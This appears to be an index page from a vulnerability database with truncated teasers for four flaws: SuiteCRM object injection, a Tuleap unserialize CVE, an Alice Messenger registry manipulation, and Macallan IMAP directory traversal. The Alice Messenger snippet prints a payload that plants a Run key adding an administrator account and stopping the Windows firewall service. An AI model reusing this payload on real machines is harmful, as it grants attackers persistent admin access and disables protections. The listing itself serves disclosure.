SuiteCRM 7.11.11 Second-Order PHP Object Injection

--------------------------------------------------------------------- SuiteCRM = 7.11.11 Second-Order PHP Object Injection Vulnerabilities --------------------------------------------------------------------- - Software Link: https://suitecrm.com/ - Affected Versions: Version 7.11.11 and prior...

CVE-2017-7411

An issue was discovered in Enalean Tuleap 9.6 and prior versions. The vulnerability exists because the User::getRecentElements method is using the unserialize function with a preference value that can be arbitrarily manipulated by malicious users through the REST API interface, and this can be...

Telecom Italy Alice Messenger - Remote Registry Key Manipulation

group="HKEYLOCALMACHINE" section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run" key="sun-tzu" valType=1 'REGSZ value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config SharedAccess start= disabled & net stop SharedAccess & sc config...

Macallan IMAP Server Multiple Traversals Arbitrary File/Directory Manipulation

The remote host is running Macallan Mail Solution, a mail server for Windows. The IMAP server bundled with the version of Macallan installed on the remote host fails to filter directory traversal sequences from mailbox names passed to the 'CREATE', 'DELETE, 'RENAME', and 'SELECT' commands. An...